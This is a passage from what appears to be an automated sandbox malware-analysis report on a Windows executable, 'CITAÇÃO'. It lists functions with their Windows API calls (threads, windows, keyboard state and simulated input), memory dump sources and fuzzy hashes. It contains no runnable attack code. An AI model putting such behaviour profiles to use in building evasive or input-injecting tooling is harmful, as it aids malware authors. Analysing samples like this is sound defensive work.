                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                      • String ID:
                                                      • API String ID: 155776804-0
                                                      • Opcode ID: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                      • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                                                      • Opcode Fuzzy Hash: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                      • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                                                      Function 00436C6E Relevance: 10.5, APIs: 7, Instructions: 49threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                                        • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                                      • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                                      • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                                      • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                                      • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                      • String ID:
                                                      • API String ID: 1957940570-0
                                                      • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                      • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                                      • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                      • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                                      Function 00413D1A Relevance: 10.5, APIs: 7, Instructions: 34threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                        • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                        • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                      • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                        • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                      • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                      • ExitThread.KERNEL32 ref: 00413D4E
                                                      • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                      • __freefls@4.LIBCMT ref: 00413D74
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                      • String ID:
                                                      • API String ID: 259663610-0
                                                      • Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                      • Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
                                                      • Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                      • Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
                                                      Function 0043028B Relevance: 9.3, APIs: 6, Instructions: 255COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetClientRect.USER32(?,?), ref: 004302E6
                                                      • GetWindowRect.USER32(00000000,?), ref: 00430316
                                                      • GetClientRect.USER32(?,?), ref: 00430364
                                                      • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                                      • GetWindowRect.USER32(?,?), ref: 004303C3
                                                      • ScreenToClient.USER32(?,?), ref: 004303EC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Rect$Client$Window$MetricsScreenSystem
                                                      • String ID:
                                                      • API String ID: 3220332590-0
                                                      • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                      • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                                      • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                      • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                                      Function 004577E9 Relevance: 9.2, APIs: 6, Instructions: 217COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _malloc_wcslen$_strcat_wcscpy
                                                      • String ID:
                                                      • API String ID: 1612042205-0
                                                      • Opcode ID: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                                      • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                                                      • Opcode Fuzzy Hash: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                                      • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                                      Function 0044F1D3 Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 422COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _memmove_strncmp
                                                      • String ID: >$U$\
                                                      • API String ID: 2666721431-237099441
                                                      • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                      • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                                                      • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                      • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                                                      Function 0044C514 Relevance: 9.2, APIs: 6, Instructions: 163windowkeyboardCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetKeyboardState.USER32(?), ref: 0044C570
                                                      • SetKeyboardState.USER32(00000080), ref: 0044C594
                                                      • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                                      • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                                      • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                                      • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: MessagePost$KeyboardState$InputSend
                                                      • String ID:
                                                      • API String ID: 2221674350-0
                                                      • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                      • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                                                      • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                      • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                                                      Function 00444BFC Relevance: 9.2, APIs: 6, Instructions: 163COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _wcscpy$_wcscat
                                                      • String ID:
                                                      • API String ID: 2037614760-0
                                                      • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                      • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                                                      • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                      • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                                                      Function 00451B42 Relevance: 9.1, APIs: 6, Instructions: 144memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                      • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                      • VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                      • VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                      • VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                      • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Variant$Copy$AllocClearErrorLastString
                                                      • String ID:
                                                      • API String ID: 960795272-0
                                                      • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                      • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                                                      • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                      • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                                                      Function 00447BA8 Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                                      • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                      • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                      • EndPaint.USER32(?,?), ref: 00447D13
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                      • String ID:
                                                      • API String ID: 4189319755-0
                                                      • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                      • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                                      • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                      • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                                      Function 0044900D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                                      • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                                      • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                                      • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$LongWindow$InvalidateRect
                                                      • String ID:
                                                      • API String ID: 1976402638-0
                                                      • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                      • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                                      • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                      • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                                      Function 00440A0D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                                      • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                                      • ShowWindow.USER32(?,00000000), ref: 00440B18
                                                      • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                                      • EnableWindow.USER32(?,00000001), ref: 00440B50
                                                      • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Window$Show$Enable$MessageSend
                                                      • String ID:
                                                      • API String ID: 642888154-0
                                                      • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                      • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                                      • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                      • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                                      Function 00448804 Relevance: 9.1, APIs: 6, Instructions: 92windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                                      • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                      • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                      • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                      • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                      • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Window$Enable$Show$MessageSend
                                                      • String ID:
                                                      • API String ID: 1871949834-0
                                                      • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                      • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                                                      • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                      • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                                      Function 00441078 Relevance: 9.1, APIs: 6, Instructions: 86COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                      • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                                      • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                      • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                                      Function 00471A38 Relevance: 9.1, APIs: 6, Instructions: 79windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                                      • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                                      • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                                      • SendMessageW.USER32 ref: 00471AE3
                                                      • DestroyIcon.USER32(?), ref: 00471AF4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
